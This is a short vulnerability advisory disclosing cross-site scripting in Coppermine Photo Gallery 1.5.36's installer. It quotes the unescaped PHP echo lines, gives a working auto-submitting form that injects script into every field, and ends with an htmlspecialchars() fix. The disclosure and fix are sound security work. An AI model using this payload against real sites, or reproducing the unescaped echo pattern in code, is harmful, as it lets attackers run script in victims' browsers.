Coppermine Photo Gallery 1.5.36 Cross Site Scripting
Posted on 13 August 2015
[+] Exploit Title: Coppermine Photo Gallery 1.5.36 Cross Site Scripting [+] Exploit Author: Ehsan Hosseini [+] Date: 27/7/2015 [+] Vendor Homepage: http://coppermine-gallery.net/ [+] Software Link: http://sourceforge.net/projects/coppermine/files/Coppermine/1.5.x/cpg1.5.36.zip/download [+] Version: 1.5.36 [+] Tested on: Windows [+] CVE : N/A =============================== Introduction : Coppermine Photo Gallery is a multi-purpose fully-featured and integrated web picture gallery script written in PHP. Coppermine Photo Gallery suffers from a Cross site scripting vulnerability. =============================== Vulnerable file is : localhost/cpg15x/install_classic.php =============================== Vulnerable Code : 316 : <input type="text" class="textinput" name="admin_username" value="<?php echo $_POST['admin_username'] ?>" /> 323 : <input type="text" class="textinput" name="admin_password" value="<?php echo $_POST['admin_password'] ?>" /> 313 : <input type="text" class="textinput" name="admin_email" value="<?php echo $_POST['admin_email'] ?>" /> 345 : <input type="text" class="textinput" name="dbserver" value="<?php echo ($_POST['dbserver'] ? $_POST['dbserver'] : 'localhost') ?>" /> 352 : <input type="text" class="textinput" name="dbname" value="<?php echo $_POST['dbname'] ?>" /> 359 : <input type="text" class="textinput" name="dbuser" value="<?php echo $_POST['dbuser'] ?>" /> 366 : <input type="text" class="textinput" name="dbpass" value="<?php echo $_POST['dbpass'] ?>" /> 373 : <input type="text" class="textinput" name="table_prefix" value="<?php echo ($_POST['table_prefix'] ? $_POST['table_prefix'] : 'cpg15x_') ?>" /> 390 : <input type="text" class="textinput" name="impath" value="<?php echo $_POST['impath'] ?>" /> =============================== Exploit : <body onload='document.exploit.submit()'> <form name='exploit' action='http://localhost/cpg15x//install_classic.php' method='POST'> <input type='hidden' name='admin_username' value='"><script>alert(/EXPLOITED/)</script>'> <input type='hidden' name='admin_password' value='"><script>alert(/EXPLOITED/)</script>'> <input type='hidden' name='admin_email' value='"><script>alert(/EXPLOITED/)</script>'> <input type='hidden' name='dbserver' value='"><script>alert(/EXPLOITED/)</script>'> <input type='hidden' name='dbname' value='"><script>alert(/EXPLOITED/)</script>'> <input type='hidden' name='dbuser' value='"><script>alert(/EXPLOITED/)</script>'> <input type='hidden' name='dbpass' value='"><script>alert(/EXPLOITED/)</script>'> <input type='hidden' name='table_prefix' value='"><script>alert(/EXPLOITED/)</script>'> <input type='hidden' name='impath' value='"><script>alert(/EXPLOITED/)</script>'> </form> ================================================== Path : To fix this vulnerability you use htmlspecialchars() function . <input type="text" class="textinput" name="admin_username" value="<?php echo htmlspecialchars($_POST['admin_username']) ?>" /> And other lines, too. Discovered By : Ehsan Hosseini.
